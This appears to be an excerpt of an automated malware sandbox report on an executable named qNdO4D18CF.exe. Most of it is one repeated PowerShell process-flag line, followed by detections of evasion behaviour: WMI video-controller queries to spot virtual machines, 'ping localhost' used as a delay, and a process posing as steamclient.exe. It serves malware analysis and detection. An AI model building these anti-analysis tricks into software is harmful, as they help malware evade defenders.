                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Program Files (x86)\Steam\steamclient.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Uses ping.exe to sleep
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: 2210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: 1A440000 memory reserve | memory write watchJump to behavior
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 730000 memory reserve | memory write watch
                    Source: C:\Program Files (x86)\Steam\steamclient.exeMemory allocated: 1A430000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMemory allocated: 1590000 memory reserve | memory write watch
